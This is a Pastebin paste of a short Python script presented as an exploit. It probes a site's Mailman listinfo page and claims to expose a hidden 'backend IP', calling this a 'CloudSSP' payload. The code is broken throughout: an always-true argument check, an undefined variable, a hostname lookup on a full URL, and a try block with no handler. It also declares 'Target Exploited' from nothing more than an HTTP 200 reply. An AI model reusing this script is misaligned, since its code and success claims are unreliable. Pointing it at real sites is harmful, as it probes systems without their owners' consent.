Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import requests, sys, os, json, socket
- from urllib.parse import urlparse
- def exploit(_url, _exploit):
- if _exploit == '-a' or '--all':
- for exploit in exploits:
- print(f'Testing on {exploit} on {_url}')
- else:
- print('Using default payload : CloudSSP')
- print(f'Current Target : {_url}')
- try:
- endpoint = requests.get(f'{_url}/mailman/listinfo/mailman')
- if endpoint.status_code == 200:
- ip = socket.gethostbyname(f'{_url}/mailman/listinfo/mailman')
- print(f'Target Exploited\nBackend IP : {ip}')
- else:
- print('Target Not Vulnerable To CloudSSP')
- if len(sys.argv) < 2:
- print (f'Examples :\npython3 {sys.argv[0]} <URL> --all\npython3 {sys.argv[0]} <URL> -p payload')
- sys.exit()
- else:
- exploit(sys.argv[1], sys.argv[2])
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement